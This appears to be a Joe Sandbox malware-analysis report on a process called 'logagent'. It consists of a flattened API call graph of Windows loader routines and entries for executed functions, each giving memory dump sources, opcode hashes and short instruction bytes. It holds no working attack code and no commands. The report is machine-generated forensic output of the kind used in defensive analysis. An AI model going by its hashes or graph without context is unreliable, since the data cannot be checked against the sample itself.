16054->16012 16056 51e00d9 16055->16056 16078 51e00ea _vswprintf_s 16055->16078 16057 51dc07f 20 API calls 16056->16057 16056->16078 16057->16078 16058 51dfda0 98 API calls 16058->16078 16059 51e0223 16061 51e022f 16059->16061 16062 51e02ba 16059->16062 16060 51ca8c0 14 API calls 16060->16078 16063 51e002d 6 API calls 16061->16063 16064 51ef99e 64 API calls 16062->16064 16065 51e0234 16063->16065 16066 51e023c 16064->16066 16065->16066 16070 5236dc9 62 API calls 16065->16070 16071 5224c11 16066->16071 16072 51e024a 16066->16072 16067 51e02f3 53 API calls 16067->16078 16068 51e02d6 GetPEB 16068->16078 16069 51bad30 GetPEB 16069->16078 16070->16066 16073 51bad30 GetPEB 16071->16073 16074 51e02d6 GetPEB 16072->16074 16076 5224c1a 16073->16076 16077 51e026a 16074->16077 16075 51e03e2 233 API calls 16075->16078 16076->16076 16079 51e0274 16077->16079 16081 51eb390 GetPEB 16077->16081 16078->16058 16078->16059 16078->16060 16078->16067 16078->16068 16078->16069 16078->16075 16080 51fb640 _vswprintf_s 12 API calls 16079->16080 16082 51e0287 16080->16082 16081->16079 16082->16020 16084 51d7d50 GetPEB 16083->16084 16085 51bb1f1 16084->16085 16086 51bb1f9 16085->16086 16087 5214a0e GetPEB 16085->16087 16088 5214a21 GetPEB 16086->16088 16089 51bb207 16086->16089 16087->16088 16088->16089 16090 5214a34 16088->16090 16096 51baa16 16089->16096 16091 51d7d50 GetPEB 16090->16091 16092 5214a39 16091->16092 16093 5214a4d 16092->16093 16094 5214a3d GetPEB 16092->16094 16093->16089 16095 5237016 16 API calls 16093->16095 16094->16093 16095->16089 16097 5214458 GetPEB 16096->16097 16098 51baa42 16096->16098 16099 51baa52 __cftof 16097->16099 16098->16097 16098->16099 16101 51e5e50 47 API calls 16099->16101 16108 51baa64 16099->16108 16100 51fb640 _vswprintf_s 12 API calls 16102 51baa71 16100->16102 16103 52144ad 16101->16103 16102->16007 16104 52144e6 16103->16104 16105 51eb230 33 API calls 16103->16105 16106 52144ee GetPEB 16104->16106 16104->16108 16107 52144db 16105->16107 16106->16108 16109 51bf7a0 35 API calls 16107->16109 16108->16100 16109->16104 16111 51c6a3a 53 API calls 16110->16111 16112 51e3743 16111->16112 16113 51e3792 16112->16113 16114 51e02f3 53 API calls 16112->16114 16115 51e03e2 233 API calls 16113->16115 16123 51e37a5 16113->16123 16120 51e3760 16114->16120 16115->16123 16116 51e37b9 16118 51fb640 _vswprintf_s 12 API calls 16116->16118 16117 51bad30 GetPEB 16117->16116 16119 51e37cc 16118->16119 16119->16020 16120->16113 16121 51e37d0 16120->16121 16122 51ef99e 64 API calls 16121->16122 16122->16123 16123->16116 16123->16117 16125 51ef948 16124->16125 16126 51ef97e 16125->16126 16127 51ef952 16125->16127 16129 51c6b6b 52 API calls 16126->16129 16128 51ef99e 64 API calls 16127->16128 16130 51ef959 16128->16130 16131 51ef989 16129->16131 16132 51ef967 16130->16132 16133 522bdad 16130->16133 16131->16130 16134 51e03e2 233 API calls 16131->16134 16136 51fb640 _vswprintf_s 12 API calls 16132->16136 16135 51bad30 GetPEB 16133->16135 16134->16130 16137 522bdb6 16135->16137 16138 51ef97a 16136->16138 16137->16137 16138->16020 16142 5235543 16139->16142 16140 5235612 16141 51fb640 _vswprintf_s 12 API calls 16140->16141 16144 523561f 16141->16144 16142->16140 16143 5235767 12 API calls 16142->16143 16145 52355f6 16143->16145 16144->16007 16146 51bb171 __cftof 12 API calls 16145->16146 16146->16140 16148 526ff4d _vswprintf_s 16147->16148 16149 526ffaf _vswprintf_s 16148->16149 16151 5272073 16148->16151 16149->15648 16161 526fd22 16151->16161 16153 527207d 16154 5272085 16153->16154 16155 52720a4 16153->16155 16157 5268df1 13 API calls 16154->16157 16156 52720be 16155->16156 16164 5271c06 GetPEB 16155->16164 16156->16149 16159 52720a2 16157->16159 16159->16149 16162 51f9670 _vswprintf_s LdrInitializeThunk 16161->16162 16163 526fd3d 16162->16163 16163->16153 16165 5271c20 GetPEB 16164->16165 16166 5271c3d 16164->16166 16167 51bb150 __cftof 12 API calls 16165->16167 16168 51bb150 __cftof 12 API calls 16166->16168 16169 5271c3a 16167->16169 16168->16169 16170 51bb150 __cftof 12 API calls 16169->16170 16171 5271c5a GetPEB 16170->16171 16173 5271ce7 GetPEB 16171->16173 16174 5271d04 16171->16174 16175 51bb150 __cftof 12 API calls 16173->16175 16176 51bb150 __cftof 12 API calls 16174->16176 16177 5271d01 16175->16177 16176->16177 16178 51bb150 __cftof 12 API calls 16177->16178 16179 5271d1c 16178->16179 16180 5271d27 GetPEB 16179->16180 16181 5271d66 16179->16181 16184 5271d32 GetPEB 16180->16184 16185 5271d4f 16180->16185 16182 5271daf 16181->16182 16183 5271d70 GetPEB 16181->16183 16189 5271db9 GetPEB 16182->16189 16216 5271df8 16182->16216 16187 5271d7b GetPEB 16183->16187 16188 5271d98 16183->16188 16190 51bb150 __cftof 12 API calls 16184->16190 16186 51bb150 __cftof 12 API calls 16185->16186 16191 5271d4c 16186->16191 16194 51bb150 __cftof 12 API calls 16187->16194 16196 51bb150 __cftof 12 API calls 16188->16196 16192 5271dc4 GetPEB 16189->16192 16193 5271de1 16189->16193 16190->16191 16197 51bb150 __cftof 12 API calls 16191->16197 16199 51bb150 __cftof 12 API calls 16192->16199 16200 51bb150 __cftof 12 API calls 16193->16200 16198 5271d95 16194->16198 16195 5271e0a GetPEB 16202 5271e15 GetPEB 16195->16202 16203 5271e32 16195->16203 16196->16198 16197->16181 16208 51bb150 __cftof 12 API calls 16198->16208 16205 5271dde 16199->16205 16200->16205 16201 5271e52 GetPEB 16206 5271e5d GetPEB 16201->16206 16207 5271e7a 16201->16207 16209 51bb150 __cftof 12 API calls 16202->16209 16204 51bb150 __cftof 12 API calls 16203->16204 16213 5271e2f 16204->16213 16212 51bb150 __cftof 12 API calls 16205->16212 16210 51bb150 __cftof 12 API calls 16206->16210 16211 51bb150 __cftof 12 API calls 16207->16211 16208->16182 16209->16213 16215 5271e77 16210->16215 16211->16215 16212->16216 16214 51bb150 __cftof 12 API calls 16213->16214 16217 5271e4f 16214->16217 16218 51bb150 __cftof 12 API calls 16215->16218 16216->16195 16216->16201 16217->16201 16219 5271e90 GetPEB 16218->16219 16219->16156 16221 527f03a 16220->16221 16238 527ee22 16221->16238 16225 52753f7 16224->16225 16226 5275552 16224->16226 16228 5275403 16225->16228 16229 52754eb 16225->16229 16227 527547c 16226->16227 16230 5237b9c 33 API calls 16226->16230 16233 51fb640 _vswprintf_s 12 API calls 16227->16233 16231 5275481 16228->16231 16232 527540b 16228->16232 16229->16227 16234 5237b9c 33 API calls 16229->16234 16230->16227 16231->16227 16236 5237b9c 33 API calls 16231->16236 16232->16227 16237 5237b9c 33 API calls 16232->16237 16235 52755bd 16233->16235 16234->16227 16235->15655 16236->16227 16237->16227 16239 527ee5d 16238->16239 16241 527ee73 16239->16241 16242 527ef09 16239->16242 16240 51fb640 _vswprintf_s 12 API calls 16243 527efd4 16240->16243 16248 527eef5 16241->16248 16249 527f607 16241->16249 16242->16248 16254 527f8c5 16242->16254 16243->15653 16248->16240 16251 527f626 16249->16251 16250 527eedd 16250->16248 16253 51f96e0 LdrInitializeThunk 16250->16253 16251->16250 16252 528165e LdrInitializeThunk 16251->16252 16252->16251 16253->16248 16255 527f8ea 16254->16255 16256 527f932 16255->16256 16257 527f607 LdrInitializeThunk 16255->16257 16256->16248 16258 527f90f 16257->16258 16258->16256 16260 51f96e0 LdrInitializeThunk 16258->16260 16260->16256 16262 527ae6a 16261->16262 16265 527af27 16262->16265 16266 527af3d 16262->16266 16270 527af38 16262->16270 16263 527afc3 16301 527fde2 16263->16301 16264 527af6c 16279 527ea55 16264->16279 16269 527a80d 28 API calls 16265->16269 16266->16263 16266->16264 16269->16270 16270->15622 16272 51d7d50 GetPEB 16273 527af85 16272->16273 16274 527af99 16273->16274 16275 527af89 GetPEB 16273->16275 16274->16270 16276 527afa3 GetPEB 16274->16276 16275->16274 16276->16270 16277 527afb2 16276->16277 16277->16270 16294 5271608 16277->16294 16280 527ea74 16279->16280 16281 527ea8d 16280->16281 16283 527eab0 16280->16283 16282 527a80d 28 API calls 16281->16282 16284 527af7a 16282->16284 16285 527afde 33 API calls 16283->16285 16284->16272 16286 527eb12 16285->16286 16287 527bcd2 255 API calls 16286->16287 16288 527eb3d 16287->16288 16289 51d7d50 GetPEB 16288->16289 16290 527eb48 16289->16290 16291 527eb60 16290->16291 16292 527eb4c GetPEB 16290->16292 16291->16284 16293 526fe3f 14 API calls 16291->16293 16292->16291 16293->16284 16295 51d7d50 GetPEB 16294->16295 16296 5271634 16295->16296 16297 5271638 GetPEB 16296->16297 16298 5271648 _vswprintf_s 16296->16298 16297->16298 16299 51fb640 _vswprintf_s 12 API calls 16298->16299 16300 527166b 16299->16300 16300->16270 16302 527fdf5 16301->16302 16303 527fe12 16302->16303 16304 527fdfe 16302->16304 16306 527febd 16303->16306 16307 527fe2c 16303->16307 16305 527a80d 28 API calls 16304->16305 16308 527fe0d 16305->16308 16311 5280a13 248 API calls 16306->16311 16309 527fe45 16307->16309 16310 527fe35 16307->16310 16308->16270 16339 5282b28 16309->16339 16330 527dbd2 16310->16330 16313 527fecb 16311->16313 16316 51d7d50 GetPEB 16313->16316 16315 527fe55 16317 527fe41 16315->16317 16351 527c8f7 16315->16351 16318 527fed3 16316->16318 16321 51d7d50 GetPEB 16317->16321 16319 527fee7 16318->16319 16320 527fed7 GetPEB 16318->16320 16319->16308 16324 527fef1 GetPEB 16319->16324 16320->16319 16323 527fe77 16321->16323 16325 527fe8b 16323->16325 16326 527fe7b GetPEB 16323->16326 16324->16308 16329 527fea4 16324->16329 16325->16308 16327 527fe95 GetPEB 16325->16327 16326->16325 16327->16308 16327->16329 16328 5271608 14 API calls 16328->16308 16329->16308 16329->16328 16332 527dc12 16330->16332 16335 527dd1f 16330->16335 16331 527dcca 16331->16317 16332->16331 16333 527dcb2 16332->16333 16336 527dcd1 16332->16336 16334 527a80d 28 API calls 16333->16334 16334->16331 16335->16331 16361 527c52d 16335->16361 16336->16335 16355 527d8df 16336->16355 16345 5282b46 16339->16345 16340 5282bbf 16342 527a80d 28 API calls 16340->16342 16341 5282bd3 16343 5282c15 16341->16343 16344 5282c36 16341->16344 16349 5282bce 16342->16349 16346 527a80d 28 API calls 16343->16346 16377 528241a 16344->16377 16345->16340 16345->16341 16346->16349 16348 5282c4a 16348->16349 16381 5283209 16348->16381 16349->16315 16352 527c915 16351->16352 16353 527c94b 16351->16353 16352->16353 16393 527c43e 16352->16393 16353->16317 16358 527d917 16355->16358 16356 51fb640 _vswprintf_s 12 API calls 16357 527da95 16356->16357 16357->16335 16359 527d96d 16358->16359 16360 525da47 243 API calls 16358->16360 16359->16356 16360->16359 16364 527c548 16361->16364 16362 527c595 16362->16331 16364->16362 16365 527db14 16364->16365 16366 527dbae 16365->16366 16368 527db4f 16365->16368 16371 527c95a 16366->16371 16369 51fb640 _vswprintf_s 12 API calls 16368->16369 16370 527dbcc 16369->16370 16370->16362 16372 527c9e8 16371->16372 16374 527c99f 16371->16374 16373 527d8df 243 API calls 16372->16373 16373->16374 16375 51fb640 _vswprintf_s 12 API calls 16374->16375 16376 527ca15 16375->16376 16376->16368 16378 528242f 16377->16378 16380 528246c 16378->16380 16385 52822ae 16378->16385 16380->16348 16382 5283240 16381->16382 16383 51fb640 _vswprintf_s 12 API calls 16382->16383 16384 528324d 16383->16384 16384->16349 16386 52822dd 16385->16386 16388 52823ee 16386->16388 16389 5282fbd 16386->16389 16388->16378 16390 5282fe4 16389->16390 16391 51fb640 _vswprintf_s 12 API calls 16390->16391 16392 52830f0 16391->16392 16392->16388 16396 527c46c _vswprintf_s 16393->16396 16394 51fb640 _vswprintf_s 12 API calls 16395 527c529 16394->16395 16395->16353 16396->16394 16398 527f23b 16397->16398 16400 527f27a 16398->16400 16401 527f241 16398->16401 16399 527f28f _vswprintf_s 16405 527f26d 16399->16405 16409 527f7dd 16399->16409 16400->16399 16408 51f96e0 LdrInitializeThunk 16400->16408 16407 51f96e0 LdrInitializeThunk 16401->16407 16405->15677 16406->15677 16407->16405 16408->16399 16410 527f803 16409->16410 16415 527f4a1 16410->16415 16414 527f82d 16414->16405 16416 527f4bc 16415->16416 16417 528165e LdrInitializeThunk 16416->16417 16419 527f4ea 16417->16419 16418 527f51c 16421 51f96e0 LdrInitializeThunk 16418->16421 16419->16418 16420 528165e LdrInitializeThunk 16419->16420 16420->16419 16421->16414 15341 51f9540 LdrInitializeThunk 16422 51b1e04 16423 51b1e10 _vswprintf_s 16422->16423 16424 527a80d 28 API calls 16423->16424 16425 51b1e37 _vswprintf_s 16423->16425 16426 520f18b 16424->16426 16427 526d380 16428 526d393 16427->16428 16430 526d38c 16427->16430 16429 526d3a0 GetPEB 16428->16429 16429->16430 16431 52037cc 16432 52037db 16431->16432 16433 52037ea 16432->16433 16435 520590b 16432->16435 16436 5205917 16435->16436 16438 520592d 16435->16438 16437 51fb58e __cftof 12 API calls 16436->16437 16439 5205923 16437->16439 16438->16433 16439->16433 15342 51efab0 15343 51efb14 15342->15343 15344 51efac2 15342->15344 15345 51ceef0 27 API calls 15344->15345 15346 51efacd 15345->15346 15347 51efadf 15346->15347 15351 51efb18 15346->15351 15348 51ceb70 33 API calls 15347->15348 15349 51efaf1 15348->15349 15349->15343 15350 51efafa GetPEB 15349->15350 15350->15343 15352 51efb09 15350->15352 15357 522bdcb 15351->15357 15378 51c6d90 15351->15378 15388 51cff60 15352->15388 15356 522bea7 15358 51c76e2 GetPEB 15356->15358 15377 51efc4b 15356->15377 15357->15356 15360 51bb150 __cftof 12 API calls 15357->15360 15361 522be19 15357->15361 15358->15377 15359 51efba7 15363 51efbe4 15359->15363 15359->15377 15396 51efd22 15359->15396 15360->15361 15361->15356 15408 51c75ce 15361->15408 15365 522bf17 15363->15365 15366 51efc47 15363->15366 15363->15377 15367 51efd22 GetPEB 15365->15367 15365->15377 15368 51efd22 GetPEB 15366->15368 15366->15377 15370 522bf22 15367->15370 15371 51efcb2 15368->15371 15369 522be54 15372 522be92 15369->15372 15369->15377 15412 51c76e2 15369->15412 15374 51efd9b 3 API calls 15370->15374 15370->15377 15371->15377 15400 51efd9b 15371->15400 15372->15356 15376 51c76e2 GetPEB 15372->15376 15374->15377 15376->15356 15379 51c6dba 15378->15379 15380 51c6da4 15378->15380 15416 51f2e1c 15379->15416 15380->15357 15380->15359 15380->15377 15382 51c6dbf 15383 51ceef0 27 API calls 15382->15383 15384 51c6dca 15383->15384 15385 51c6dde 15384->15385 15421 51bdb60 15384->15421 15387 51ceb70 33 API calls 15385->15387 15387->15380 15389 51cff6d 15388->15389 15390 51cff99 15388->15390 15389->15390 15392 51cff80 GetPEB 15389->15392 15391 52888f5 33 API calls 15390->15391 15393 51cff94 15391->15393 15392->15390 15394 51cff8f 15392->15394 15393->15343 15533 51d0050 15394->15533 15397 51efd31 __cftof 15396->15397 15398 51efd3a 15396->15398 15397->15363 15398->15397 15567 51c7608 15398->15567 15401 51efdba GetPEB 15400->15401 15402 51efdcc 15400->15402 15401->15402 15403 51efdf2 15402->15403 15404 522c0bd 15402->15404 15407 51efdfc 15402->15407 15405 51c76e2 GetPEB 15403->15405 15403->15407 15406 522c0d3 GetPEB 15404->15406 15404->15407 15405->15407 15406->15407 15407->15377 15409 51c75db 15408->15409 15410 51c75eb 15408->15410 15409->15410 15411 51c7608 GetPEB 15409->15411 15410->15369 15411->15410 15413 51c76fd 15412->15413 15414 51c76e6 15412->15414 15413->15372 15414->15413 15415 51c76ec GetPEB 15414->15415 15415->15413 15417 51f2e32 15416->15417 15418 51f2e57 15417->15418 15429 51f9840 LdrInitializeThunk 15417->15429 15418->15382 15420 522df2e 15422 51bdb6d 15421->15422 15428 51bdb91 15421->15428 15422->15428 15430 51bdb40 GetPEB 15422->15430 15424 51bdb76 15424->15428 15432 51be7b0 15424->15432 15426 51bdb87 15427 5214fa6 GetPEB 15426->15427 15426->15428 15427->15428 15428->15385 15429->15420 15431 51bdb52 15430->15431 15431->15424 15433 51be7e0 15432->15433 15434 51be7ce 15432->15434 15435 51be7e8 15433->15435 15437 51bb150 __cftof 12 API calls 15433->15437 15434->15435 15440 51c3d34 15434->15440 15439 51be7f6 15435->15439 15479 51bdca4 15435->15479 15437->15435 15439->15426 15441 51c3d6c 15440->15441 15442 5218213 15440->15442 15495 51c1b8f 15441->15495 15446 521822b GetPEB 15442->15446 15465 51c4068 15442->15465 15444 51c3d81 15444->15442 15445 51c3d89 15444->15445 15447 51c1b8f 2 API calls 15445->15447 15446->15465 15448 51c3d9e 15447->15448 15449 51c3dba 15448->15449 15450 51c3da2 GetPEB 15448->15450 15451 51c1b8f 2 API calls 15449->15451 15450->15449 15452 51c3dd2 15451->15452 15453 51c3e91 15452->15453 15455 51c3deb GetPEB 15452->15455 15452->15465 15456 51c1b8f 2 API calls 15453->15456 15454 5218344 GetPEB 15457 51c407a 15454->15457 15472 51c3dfc __cftof _vswprintf_s 15455->15472 15459 51c3ea9 15456->15459 15458 51c4085 15457->15458 15460 5218363 GetPEB 15457->15460 15458->15433 15461 51c3f6a 15459->15461 15463 51c3ec2 GetPEB 15459->15463 15459->15465 15460->15458 15462 51c1b8f 2 API calls 15461->15462 15464 51c3f82 15462->15464 15477 51c3ed3 __cftof _vswprintf_s 15463->15477 15464->15465 15466 51c3f9b GetPEB 15464->15466 15465->15454 15465->15457 15478 51c3fac __cftof _vswprintf_s 15466->15478 15467 51c3e74 15467->15453 15469 51c3e81 GetPEB 15467->15469 15468 51c3e62 GetPEB 15468->15467 15469->15453 15470 51c3f3b GetPEB 15471 51c3f4d 15470->15471 15471->15461 15473 51c3f5a GetPEB 15471->15473 15472->15465 15472->15467 15472->15468 15473->15461 15474 51c404f 15474->15465 15476 51c4058 GetPEB 15474->15476 15475 5218324 GetPEB 15475->15465 15476->15465 15477->15465 15477->15470 15477->15471 15478->15465 15478->15474 15478->15475 15481 51bdcfd 15479->15481 15493 51bdd6f _vswprintf_s 15479->15493 15480 51bdd47 15510 51bdbb1 15480->15510 15481->15480 15489 51bdfc2 15481->15489 15501 51be620 15481->15501 15483 5214ff2 15483->15483 15486 51bdfae 15486->15489 15523 51f95d0 LdrInitializeThunk 15486->15523 15490 51fb640 _vswprintf_s 12 API calls 15489->15490 15492 51bdfe4 15490->15492 15492->15439 15493->15483 15493->15486 15493->15489 15517 51be375 15493->15517 15522 51f95d0 LdrInitializeThunk 15493->15522 15497 51c1ba9 _vswprintf_s 15495->15497 15500 51c1c05 15495->15500 15496 521701a GetPEB 15498 51c1c21 15496->15498 15497->15498 15499 51c1bf4 GetPEB 15497->15499 15497->15500 15498->15444 15499->15500 15500->15496 15500->15498 15502 5215503 15501->15502 15503 51be644 15501->15503 15503->15502 15524 51bf358 15503->15524 15505 51be725 15507 51be73b 15505->15507 15508 51be729 GetPEB 15505->15508 15507->15480 15508->15507 15509 51be661 _vswprintf_s 15509->15505 15528 51f95d0 LdrInitializeThunk 15509->15528 15529 51c766d 15510->15529 15512 51bdbcf 15512->15493 15513 51bdbf1 15512->15513 15514 51bdc05 15513->15514 15515 51c766d GetPEB 15514->15515 15516 51bdc22 15515->15516 15516->15493 15521 51be3a3 15517->15521 15518 51fb640 _vswprintf_s 12 API calls 15519 51be400 15518->15519 15519->15493 15520 5215306 15521->15518 15521->15520 15522->15493 15523->15489 15525 51bf370 15524->15525 15526 51bf38c 15525->15526 15527 51bf379 GetPEB 15525->15527 15526->15509 15527->15526 15528->15505 15531 51c7687 15529->15531 15530 51c76d3 15530->15512 15531->15530 15532 51c76c2 GetPEB 15531->15532 15532->15530 15534 51d0074 15533->15534 15535 51d009d GetPEB 15534->15535 15545 51d00ef 15534->15545 15537 521c01b 15535->15537 15540 51d00d0 15535->15540 15536 51fb640 _vswprintf_s 12 API calls 15538 51d0105 15536->15538 15539 521c024 GetPEB 15537->15539 15537->15540 15538->15393 15539->15540 15541 51d00df 15540->15541 15542 521c037 15540->15542 15547 51e9702 15541->15547 15551 5288a62 15542->15551 15545->15536 15546 521c04b 15546->15546 15549 51e9720 15547->15549 15550 51e9784 15549->15550 15558 5288214 15549->15558 15550->15545 15552 51d7d50 GetPEB 15551->15552 15553 5288a9d 15552->15553 15554 5288aa1 GetPEB 15553->15554 15555 5288ab1 _vswprintf_s 15553->15555 15554->15555 15556 51fb640 _vswprintf_s 12 API calls 15555->15556 15557 5288ad7 15556->15557 15557->15546 15560 528823b 15558->15560 15559 52882c0 15559->15550 15560->15559 15562 51e3b7a GetPEB 15560->15562 15564 51e3bb5 _vswprintf_s 15562->15564 15563 5226298 15564->15563 15565 51e3c1b GetPEB 15564->15565 15566 51e3c35 15565->15566 15566->15559 15568 51c7620 15567->15568 15569 51c766d GetPEB 15568->15569 15570 51c7632 15569->15570 15570->15397 16440 51f35b1 16441 51f35ca 16440->16441 16442 51f35f2 16440->16442 16441->16442 16443 51c7608 GetPEB 16441->16443 16443->16442 15572 51f9670 15573 51f967a _vswprintf_s LdrInitializeThunk 15572->15573 16444 523b111 16445 523b131 16444->16445 16447 523b143 16444->16447 16448 52421b7 16445->16448 16451 51fe3a0 16448->16451 16454 51fe3bd 16451->16454 16453 51fe3b8 16453->16447 16455 51fe3cc 16454->16455 16456 51fe3e3 16454->16456 16457 51fb58e __cftof 12 API calls 16455->16457 16458 51fb58e __cftof 12 API calls 16456->16458 16459 51fe3d8 _vswprintf_s 16456->16459 16457->16459 16458->16459 16459->16453 16460 51b0b60 16461 51b0b72 16460->16461 16463 51b0baf 16460->16463 16461->16463 16464 51b0bd0 16461->16464 16465 51b0c66 16464->16465 16471 51b0c05 16464->16471 16466 520e940 16465->16466 16467 520e915 16465->16467 16470 51b0c8d _vswprintf_s 16465->16470 16469 5201700 12 API calls 16466->16469 16466->16470 16467->16470 16473 5201700 16467->16473 16469->16470 16470->16463 16471->16465 16471->16470 16472 5201700 12 API calls 16471->16472 16472->16471 16476 52014e9 16473->16476 16475 520171c 16475->16470 16477 52014fb 16476->16477 16478 51fb58e __cftof 12 API calls 16477->16478 16479 520150e __cftof 16477->16479 16478->16479 16479->16475 16480 527131b 16481 51d7d50 GetPEB 16480->16481 16482 527134d 16481->16482 16483 5271351 GetPEB 16482->16483 16484 5271361 _vswprintf_s 16482->16484 16483->16484 16485 51fb640 _vswprintf_s 12 API calls 16484->16485 16486 5271384 16485->16486 16487 51e35a1 16488 51e35a7 16487->16488 16489 51e35b8 GetPEB 16488->16489 16490 51e35b7 16488->16490 16491 51ceb70 33 API calls 16489->16491 16491->16490

                                              Executed Functions

                                              Function 051F9910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 14 51f9910-51f991c LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 4f054282bab53422680550c6f42788faa1ab128cca2cf6b29b9c49e613251cf7
                                              • Instruction ID: 36a5abb69d5775f056cb57e4d18d5419f46b5afc837f499084b2c3ff18aec71f
                                              • Opcode Fuzzy Hash: 4f054282bab53422680550c6f42788faa1ab128cca2cf6b29b9c49e613251cf7
                                              • Instruction Fuzzy Hash: 719002B221300402D24071A9444474600159BD0351F91D011A5054558F86D98DD576A5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051F9540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 4 51f9540-51f954c LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 3b2ff82fc1dd927a7f9230c76c6da33555702e82ab7545dc85c613a63777fb8c
                                              • Instruction ID: d80fd1d4406fd0e1831eceba31ec40f63de4921b07b359708c8b85b7f87c517a
                                              • Opcode Fuzzy Hash: 3b2ff82fc1dd927a7f9230c76c6da33555702e82ab7545dc85c613a63777fb8c
                                              • Instruction Fuzzy Hash: A6900266223000030205A5A9074450700569BD53A1391D021F1005554DD6E188616161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051F99A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 15 51f99a0-51f99ac LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: c4cd978357d15933c57e2841f20ebe5ceb552ec265974bd46ffce259338cfc7a
                                              • Instruction ID: fdb4a0b4c5a69a465b6f46ed07c6450dd96d3a8dd24d622131d7c270207d902e
                                              • Opcode Fuzzy Hash: c4cd978357d15933c57e2841f20ebe5ceb552ec265974bd46ffce259338cfc7a
                                              • Instruction Fuzzy Hash: 809002A235300442D20061A94454B060015DBE1351F91D015E1054558E86D9CC527166
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051F95D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 5 51f95d0-51f95dc LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 5f89dc7ae7d407c9b72cf69154b1414681e42cb70845cc878804cf5d8e483d4b
                                              • Instruction ID: e40c7b797085405905649aa7a96bbddd33d53bf39ee369dccb727e63a5d2be2d
                                              • Opcode Fuzzy Hash: 5f89dc7ae7d407c9b72cf69154b1414681e42cb70845cc878804cf5d8e483d4b
                                              • Instruction Fuzzy Hash: F69002A221300003420571A94454616401A9BE0251B91D021E1004594EC5E588917165
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051F9840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 11 51f9840-51f984c LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: da09bdbc36aaeca3871ef40c9089dc7b626c39286945241fe24485ba853a7a71
                                              • Instruction ID: 35ede9e9d990b7163f3b85ddb710b3e9f435e9357b1f5b48eddb120555f1e957
                                              • Opcode Fuzzy Hash: da09bdbc36aaeca3871ef40c9089dc7b626c39286945241fe24485ba853a7a71
                                              • Instruction Fuzzy Hash: ED900262253041525645B1A944445074016ABE02917D1D012A1404954D85E69856E661
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051F9860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 12 51f9860-51f986c LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
